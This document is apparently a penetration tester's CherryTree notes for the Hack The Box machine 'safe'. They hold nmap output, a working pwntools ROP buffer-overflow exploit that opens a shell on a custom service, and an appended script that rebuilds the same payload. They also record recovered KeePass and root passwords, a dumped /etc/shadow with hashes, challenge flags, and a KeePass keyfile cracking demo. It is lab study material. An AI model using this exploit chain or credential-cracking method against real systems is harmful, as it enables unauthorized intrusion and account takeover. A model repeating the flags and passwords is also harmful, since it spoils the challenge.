CherryTree notes (SQLite .ctb database; tables node, codebox, grid, image, children) for HTB host 10.10.10.147, hostname "safe", nmap output saved as ./Safe. The node text below is recovered from the database; the node tree is Methodology, 10.10.10.X (Enumeration, Exploitation, Post Exploitation) and Log Book.

Methodology

  Network Scanning
    ☐ nmap -sn 10.11.1.*
    ☐ nmap -sL 10.11.1.*
    ☐ nbtscan -r 10.11.1.0/24
    ☐ smbtree

  Individual Host Scanning
    ☐ nmap --top-ports 20 --open -iL iplist.txt
    ☐ nmap -sS -A -sV -O -p- ipaddress
    ☐ nmap -sU ipaddress

  Service Scanning
    WebApp
      ☐ Nikto
      ☐ dirb
      ☐ dirbuster
      ☐ wpscan
      ☐ dotdotpwn
      ☐ view source
      ☐ davtest\cadevar
      ☐ droopscan
      ☐ joomscan
      ☐ LFI\RFI Test
    Linux\Windows
      ☐ snmpwalk -c public -v1 ipaddress 1
      ☐ smbclient -L //ipaddress
      ☐ showmount -e ipaddress port
      ☐ rpcinfo
      ☐ Enum4Linux
    Anything Else
      ☐ nmap scripts (locate *nse* | grep servicename)
      ☐ hydra
      ☐ MSF Aux Modules
      ☐ Download the software

  Exploitation
    ☐ Gather Version Numbers
    ☐ Searchsploit
    ☐ Default Creds
    ☐ Creds Previously Gathered
    ☐ Download the software

  Post Exploitation
    Linux
      ☐ linux-local-enum.sh
      ☐ linuxprivchecker.py
      ☐ linux-exploit-suggester.sh
      ☐ unix-privesc-check.py
    Windows
      ☐ wpc.exe
      ☐ windows-exploit-suggester.py
      ☐ windows_privesc_check.py
      ☐ windows-privesc-check2.exe

  Priv Escalation
    ☐ access internal services (portfwd)
    ☐ add account
    Windows
      ☐ List of exploits
    Linux
      ☐ sudo su
      ☐ KernelDB
      ☐ Searchsploit

  Final
    ☐ Screenshot of IPConfig\WhoamI
    ☐ Copy proof.txt
    ☐ Dump hashes
    ☐ Dump SSH Keys
    ☐ Delete files

10.10.10.X (10.10.10.147)

  Enumeration

    nmap -sC -sV -p- -Pn -oA ./Safe 10.10.10.147

    Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-14 12:31 EDT
    Nmap scan report for 10.10.10.147
    Host is up (0.024s latency).
    Not shown: 65532 closed ports
    PORT     STATE SERVICE VERSION
    22/tcp   open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
    | ssh-hostkey:
    |   2048 6d:7c:81:3d:6a:3d:f9:5f:2e:1f:6a:97:e5:00:ba:de (RSA)
    |   256 99:7e:1e:22:76:72:da:3c:c9:61:7d:74:d7:80:33:d2 (ECDSA)
    |_  256 6a:6b:c3:8e:4b:28:f7:60:85:b1:62:ff:54:bc:d8:d6 (ED25519)
    80/tcp   open  http    Apache httpd 2.4.25 ((Debian))
    |_http-server-header: Apache/2.4.25 (Debian)
    |_http-title: Apache2 Debian Default Page: It works
    1337/tcp open  waste?
    | fingerprint-strings:
    |   DNSStatusRequestTCP:
    |     12:33:59 up 0 min, 0 users, load average: 0.24, 0.08, 0.03
    |   DNSVersionBindReqTCP:
    |     12:33:54 up 0 min, 0 users, load average: 0.26, 0.09, 0.03
    |   GenericLines:
    |     12:33:42 up 0 min, 0 users, load average: 0.34, 0.09, 0.03
    |     What do you want me to echo back?
    |   GetRequest:
    |     12:33:48 up 0 min, 0 users, load average: 0.28, 0.09, 0.03
    |     What do you want me to echo back? GET / HTTP/1.0
    |   HTTPOptions:
    |     12:33:49 up 0 min, 0 users, load average: 0.28, 0.09, 0.03
    |     What do you want me to echo back? OPTIONS / HTTP/1.0
    |   Help:
    |     12:34:04 up 1 min, 0 users, load average: 0.22, 0.08, 0.03
    |     What do you want me to echo back? HELP
    |   NULL:
    |     12:33:42 up 0 min, 0 users, load average: 0.34, 0.09, 0.03
    |   RPCCheck:
    |     12:33:49 up 0 min, 0 users, load average: 0.28, 0.09, 0.03
    |   RTSPRequest:
    |     12:33:49 up 0 min, 0 users, load average: 0.28, 0.09, 0.03
    |     What do you want me to echo back? OPTIONS / RTSP/1.0
    |   SSLSessionReq, TLSSessionReq, TerminalServerCookie:
    |     12:34:04 up 1 min, 0 users, load average: 0.22, 0.08, 0.03
    |_    What do you want me to echo back?
    1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
    SF-Port1337-TCP:V=7.80%I=7%D=7/14%Time=5F0DDDDE%P=x86_64-pc-linux-gnu%r(NU
    SF:LL,3E,"\x2012:33:42\x20up\x200\x20min,\x20\x200\x20users,\x20\x20load\x
    SF:20average:\x200\.34,\x200\.09,\x200\.03\n")%r(GenericLines,63,"\x2012:3
    SF:3:42\x20up\x200\x20min,\x20\x200\x20users,\x20\x20load\x20average:\x200
    SF:\.34,\x200\.09,\x200\.03\n\nWhat\x20do\x20you\x20want\x20me\x20to\x20ec
    SF:ho\x20back\?\x20\r\n")%r(GetRequest,71,"\x2012:33:48\x20up\x200\x20min,
    SF:\x20\x200\x20users,\x20\x20load\x20average:\x200\.28,\x200\.09,\x200\.0
    SF:3\n\nWhat\x20do\x20you\x20want\x20me\x20to\x20echo\x20back\?\x20GET\x20
    SF:/\x20HTTP/1\.0\r\n")%r(HTTPOptions,75,"\x2012:33:49\x20up\x200\x20min,\
    SF:x20\x200\x20users,\x20\x20load\x20average:\x200\.28,\x200\.09,\x200\.03
    SF:\n\nWhat\x20do\x20you\x20want\x20me\x20to\x20echo\x20back\?\x20OPTIONS\
    SF:x20/\x20HTTP/1\.0\r\n")%r(RTSPRequest,75,"\x2012:33:49\x20up\x200\x20mi
    SF:n,\x20\x200\x20users,\x20\x20load\x20average:\x200\.28,\x200\.09,\x200\
    SF:.03\n\nWhat\x20do\x20you\x20want\x20me\x20to\x20echo\x20back\?\x20OPTIO
    SF:NS\x20/\x20RTSP/1\.0\r\n")%r(RPCCheck,3E,"\x2012:33:49\x20up\x200\x20mi
    SF:n,\x20\x200\x20users,\x20\x20load\x20average:\x200\.28,\x200\.09,\x200\
    SF:.03\n")%r(DNSVersionBindReqTCP,3E,"\x2012:33:54\x20up\x200\x20min,\x20\
    SF:x200\x20users,\x20\x20load\x20average:\x200\.26,\x200\.09,\x200\.03\n")
    SF:%r(DNSStatusRequestTCP,3E,"\x2012:33:59\x20up\x200\x20min,\x20\x200\x20
    SF:users,\x20\x20load\x20average:\x200\.24,\x200\.08,\x200\.03\n")%r(Help,
    SF:67,"\x2012:34:04\x20up\x201\x20min,\x20\x200\x20users,\x20\x20load\x20a
    SF:verage:\x200\.22,\x200\.08,\x200\.03\n\nWhat\x20do\x20you\x20want\x20me
    SF:\x20to\x20echo\x20back\?\x20HELP\r\n")%r(SSLSessionReq,64,"\x2012:34:04
    SF:\x20up\x201\x20min,\x20\x200\x20users,\x20\x20load\x20average:\x200\.22
    SF:,\x200\.08,\x200\.03\n\nWhat\x20do\x20you\x20want\x20me\x20to\x20echo\x
    SF:20back\?\x20\x16\x03\n")%r(TerminalServerCookie,63,"\x2012:34:04\x20up\
    SF:x201\x20min,\x20\x200\x20users,\x20\x20load\x20average:\x200\.22,\x200\
    SF:.08,\x200\.03\n\nWhat\x20do\x20you\x20want\x20me\x20to\x20echo\x20back\
    SF:?\x20\x03\n")%r(TLSSessionReq,64,"\x2012:34:04\x20up\x201\x20min,\x20\x
    SF:200\x20users,\x20\x20load\x20average:\x200\.22,\x200\.08,\x200\.03\n\nW
    SF:hat\x20do\x20you\x20want\x20me\x20to\x20echo\x20back\?\x20\x16\x03\n");
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 105.18 seconds

    The 1337/tcp banner is the output of uptime followed by an echo prompt: that is the custom myapp binary (see Web Services), not a known network service.

    TCP, UDP: no separate notes recorded; see the scan above.

    Web Services
      'myapp' is the service listening on port 1337. It can be downloaded for offline analysis from http://10.10.10.147/myapp. LOOK AT THE DEFAULT PAGE SOURCE CODE (the Apache default page) to find it.
      Nikto, Dirb\DirBuster, WebDav, CMS: template nodes, nothing recorded.

    Other Services
      SMB, SNMP, DB, Other: template nodes, nothing recorded.

  Exploitation

    Service Exploited: myapp on 1337/tcp
    Vulnerability Type: ROP - BOF (stack buffer overflow exploited with a ROP chain)
    Exploit POC:
    Description:
    Discovery of Vulnerability: http://10.10.10.147/myapp
    Exploit Code Used (pwntools; payload built as bytes so it runs under Python 3; gadget addresses are absolute, so the binary is not PIE):

      from pwn import *

      target = remote("10.10.10.147", 1337)

      # 120 bytes of input reach the saved return address
      buf = b"A" * 120

      # 0x0000000000401206: pop r13; pop r14; pop r15; ret;
      pop_r13_garbage = p64(0x401206)

      # 0x000000000040116e <+15>: call 0x401040 <system@plt>
      system = p64(0x40116e)

      binsh = b"/bin/sh\x00"

      # 0x0000000000401156 <+4>: mov rdi,rsp
      # 0x0000000000401159 <+7>: jmp r13
      test = p64(0x401156)

      # ret -> pop gadget loads r13 = call system, r14/r15 = junk, then rets into test:
      # rsp now points at binsh, so mov rdi,rsp passes "/bin/sh" and jmp r13 calls system.
      chain = buf + pop_r13_garbage + system + b"BBBBBBBB" + b"CCCCCCCC" + test + binsh

      target.sendline(chain)
      target.interactive()

    Proof\Local.txt File
      ☐ Screenshot with ifconfig\ipconfig
      ☐ Submit to OSCP Exam Panel

  Post Exploitation

    JPGs and a KeePass database: the image is the keyfile for the database, and the root password is stored in the kdbx.

    Host Information: Operating System / Architecture / Domain / Installed Updates (template only, nothing recorded)
    Users & Groups: Users / Groups (template only, nothing recorded)
    Network: IPConfig\IFConfig / Network Processes / ARP / DNS / Route (template only, nothing recorded)
    Installed Applications: (template only, nothing recorded)
    Running Processes: Process List (template only, nothing recorded)
    Scheduled Jobs: Scheduled Tasks (template only, nothing recorded)
    File System: Writeable Files\Directories / Directory List (template only, nothing recorded)
    Software Versions: Software Versions / Potential Exploits (template only, nothing recorded)

    Passwords
      KeePass database (image as keyfile) master password = bullshit
      root : u3v2249dl9ptv465cogl3cnpo3fyhk

    Hashes
      user@safe:~$ su
      Password:
      root@safe:/home/user# cat /etc/shadow
      root:$6$iE0i…$SO70xxyVXLPb5eQCAjbP.oYY3UJAU0Aufp3cMciPitSSFin4Y6wwFdM.89bqBThXmPODqYDl6PqtoSd2zA1PU1:18029:0:99999:7:::   (rest of the salt lost in extraction)
      daemon:*:18029:0:99999:7:::
      bin:*:18029:0:99999:7:::
      sys:*:18029:0:99999:7:::
      sync:*:18029:0:99999:7:::
      games:*:18029:0:99999:7:::
      man:*:18029:0:99999:7:::
      lp:*:18029:0:99999:7:::
      mail:*:18029:0:99999:7:::
      news:*:18029:0:99999:7:::
      uucp:*:18029:0:99999:7:::
      proxy:*:18029:0:99999:7:::
      www-data:*:18029:0:99999:7:::
      backup:*:18029:0:99999:7:::
      list:*:18029:0:99999:7:::
      irc:*:18029:0:99999:7:::
      gnats:*:18029:0:99999:7:::
      nobody:*:18029:0:99999:7:::
      systemd-timesync:*:18029:0:99999:7:::
      systemd-network:*:18029:0:99999:7:::
      systemd-resolve:*:18029:0:99999:7:::
      systemd-bus-proxy:*:18029:0:99999:7:::
      _apt:*:18029:0:99999:7:::
      avahi-autoipd:*:18029:0:99999:7:::
      messagebus:*:18029:0:99999:7:::
      sshd:*:18029:0:99999:7:::
      user:$6$lON8PIup$XFVsRsQROfiALM72m1.4wlGtb3FXmqUYAYAPUw2cSbzQdLosKqSER094hOJAoU02W.OMNcV.gaQ4QEU1d0FhY1:18029:0:99999:7:::
      root@safe:/home/user#

    Goodies
      Service Exploited: KeePass Image Key
      Vulnerability Type:
      Exploit POC:
      Description:
      Discovery of Vulnerability: keepass2john (image given as the keyfile) > crack the kdbx master password > root password stored in the database
      Exploit Code Used:
      Proof\Local.txt File
        ☐ Screenshot with ifconfig\ipconfig
        ☐ Submit to OSCP Exam Panel

    Proof\Flags\Other
      user - 7a29ee9b0fa17ac013d4bf01fd127690
      root - d7af235eb1db9fa059d2b99a6d1d5453

  Log Book
    (empty)
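The chain in the Exploitation node works because each gadget leaves rsp sitting on the next word of the payload. The following is an added example, not code from these notes or from the myapp binary: it rebuilds the same payload with struct.pack and replays it on a toy stack that models only the three gadgets the chain uses (addresses 0x401206, 0x40116e and 0x401156 and the 120-byte padding are taken from the exploit above; the buffer's stack address is an assumption that only gives pointers a value), to show where rdi ends up pointing and why one byte too little padding derails the chain.

```python
"""Toy replay of the myapp ROP chain: which word lands where, and what system() receives."""
import struct

# Gadget addresses from the exploit above; the binary is not PIE, so they are fixed.
POP_R13_R14_R15_RET = 0x401206   # pop r13; pop r14; pop r15; ret
CALL_SYSTEM_PLT = 0x40116E       # call system@plt (inside the binary's own code)
MOV_RDI_RSP_JMP_R13 = 0x401156   # mov rdi, rsp; jmp r13
RET_OFFSET = 120                 # bytes of input before the saved return address

# Assumed stack address of the overflowed buffer (illustrative, not the real one).
BUF_ADDR = 0x7FFC_DEAD_0000


def p64(value: int) -> bytes:
    return struct.pack("<Q", value)


def build_chain(padding: int = RET_OFFSET) -> bytes:
    """Same layout as the exploit: padding, pop gadget, system, two junk words,
    the mov/jmp gadget, then the string rsp will point at."""
    return (b"A" * padding
            + p64(POP_R13_R14_R15_RET)
            + p64(CALL_SYSTEM_PLT)      # -> r13
            + b"BBBBBBBB"               # -> r14 (don't care)
            + b"CCCCCCCC"               # -> r15 (don't care)
            + p64(MOV_RDI_RSP_JMP_R13)  # target of the pop gadget's ret
            + b"/bin/sh\x00")           # rsp points here when mov rdi, rsp runs


def replay(chain: bytes) -> dict:
    """Execute the chain on a toy stack holding exactly the bytes we sent.
    Only the three gadgets are modelled; any other rip is treated as a crash."""
    def qword(addr: int) -> int:
        off = addr - BUF_ADDR
        if off < 0 or off + 8 > len(chain):
            raise RuntimeError(f"read outside the payload at {addr:#x}")
        return struct.unpack_from("<Q", chain, off)[0]

    regs = {"r13": 0, "r14": 0, "r15": 0, "rdi": 0}
    trace = []
    rsp = BUF_ADDR + RET_OFFSET          # where the overflowed function's ret reads
    rip = qword(rsp)                     # the overwritten return address
    rsp += 8
    for _ in range(16):                  # bound the walk; a real chain is short
        if rip == POP_R13_R14_R15_RET:
            for reg in ("r13", "r14", "r15"):
                regs[reg] = qword(rsp)
                rsp += 8
            rip = qword(rsp)             # the gadget's own ret
            rsp += 8
            trace.append("pop r13; pop r14; pop r15; ret")
        elif rip == MOV_RDI_RSP_JMP_R13:
            regs["rdi"] = rsp            # rdi = address of whatever is next on the stack
            rip = regs["r13"]
            trace.append("mov rdi, rsp; jmp r13")
        elif rip == CALL_SYSTEM_PLT:
            off = regs["rdi"] - BUF_ADDR
            end = chain.find(b"\x00", off) if off >= 0 else -1
            if end < 0:
                raise RuntimeError("rdi does not point at a NUL-terminated string in the payload")
            trace.append("call system@plt")
            return {"argument": chain[off:end].decode(), "trace": trace,
                    "r14": regs["r14"], "r15": regs["r15"]}
        else:
            raise RuntimeError(f"control flow left the chain at rip={rip:#x}")
    raise RuntimeError("chain did not reach system")


def reaches_system(chain: bytes) -> bool:
    """True when the replay ends in system("/bin/sh"), False on any crash."""
    try:
        return replay(chain)["argument"] == "/bin/sh"
    except RuntimeError:
        return False


if __name__ == "__main__":
    result = replay(build_chain())
    print("system() argument:", result["argument"])
    for step in result["trace"]:
        print("  ", step)
    try:
        replay(build_chain(padding=RET_OFFSET - 1))
    except RuntimeError as exc:
        print("off-by-one padding:", exc)
```

The replay makes the two facts the exploit depends on explicit: the pop gadget consumes exactly three stack words before its ret, so the mov/jmp gadget address must be the fourth word after it, and at the moment mov rdi, rsp runs the string must be the very next word, because no further pops happen before system is reached.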
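The KeePass step in the Post Exploitation and Goodies nodes ("the image is the keyfile", keepass2john, then crack) rests on how KeePass 2.x turns a key file into key material. The following is an added example, not code from these notes or from KeePass or john: it reimplements that derivation with hashlib from the documented KeePass 2.x rules (a version-1.00 XML key file is base64-decoded, a 32-byte file is used as-is, 64 hex characters are hex-decoded, anything else is SHA-256 hashed) and the composite key SHA-256(SHA-256(password) || keyfile key). The sample image bytes, XML key file and the candidate wordlist are constructed test inputs; the real cracking is done by keepass2john -k <keyfile> <db.kdbx> followed by john, which this block does not run.

```python
"""KeePass 2.x key-file handling and composite key, reimplemented for illustration."""
import base64
import hashlib
import re
import xml.etree.ElementTree as ET
from typing import Iterable, Optional

HEX64 = re.compile(rb"[0-9A-Fa-f]{64}")


def keyfile_key(data: bytes) -> bytes:
    """Return the 32-byte key KeePass 2.x derives from a key file's raw bytes.

    Rules (KeePass 2.x, XML key files up to version 1.00):
      1. KeePass XML key file  -> base64-decode <KeyFile><Key><Data>
      2. exactly 32 bytes       -> used as-is
      3. 64 hex characters      -> hex-decoded
      4. anything else          -> SHA-256 of the whole file
    Rule 4 is what lets a JPG act as a key file: the image is simply hashed,
    so every byte of it (EXIF included) has to arrive unchanged.
    """
    try:
        root = ET.fromstring(data)
        if root.tag == "KeyFile":
            node = root.find("./Key/Data")
            if node is not None and node.text:
                return base64.b64decode("".join(node.text.split()))
    except ET.ParseError:
        pass  # not XML: fall through to the binary rules
    if len(data) == 32:
        return data
    if len(data) == 64 and HEX64.fullmatch(data):
        return bytes.fromhex(data.decode("ascii"))
    return hashlib.sha256(data).digest()


def composite_key(password: Optional[bytes], keyfile: Optional[bytes]) -> bytes:
    """SHA-256 over the concatenated key sources in KeePass's fixed order:
    password first (as SHA-256 of its UTF-8 bytes), then the key-file key."""
    if password is None and keyfile is None:
        raise ValueError("at least one key source is required")
    parts = b""
    if password is not None:
        parts += hashlib.sha256(password).digest()
    if keyfile is not None:
        parts += keyfile_key(keyfile)
    return hashlib.sha256(parts).digest()


def crack_demo(candidates: Iterable[bytes], keyfile: Optional[bytes],
               target_key: bytes) -> Optional[bytes]:
    """What keepass2john + john do conceptually: each candidate password is
    combined with the key-file key before comparison, so a run that omits the
    key file can never match, however good the wordlist."""
    for cand in candidates:
        if composite_key(cand, keyfile) == target_key:
            return cand
    return None


# Constructed sample inputs (not the real files from the target).
SAMPLE_JPG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"constructed image bytes" * 4
SAMPLE_PASSWORD = b"bullshit"
SAMPLE_XML_KEY = b"\x01" * 32
SAMPLE_XML_KEYFILE = (b"<KeyFile><Meta><Version>1.00</Version></Meta><Key><Data>"
                      + base64.b64encode(SAMPLE_XML_KEY) + b"</Data></Key></KeyFile>")
SAMPLE_WORDLIST = [b"password", b"123456", b"bullshit", b"letmein"]


if __name__ == "__main__":
    target = composite_key(SAMPLE_PASSWORD, SAMPLE_JPG)
    print("composite key   :", target.hex())
    print("with key file   :", crack_demo(SAMPLE_WORDLIST, SAMPLE_JPG, target))
    print("without key file:", crack_demo(SAMPLE_WORDLIST, None, target))
```

Two practical consequences for the workflow in the notes: copy the image in binary mode and compare a checksum on both ends before using it, since the key is a hash of the exact file contents; and always pass the key file to keepass2john (the -k option), because a hash generated without it describes a different composite key and no candidate will ever verify.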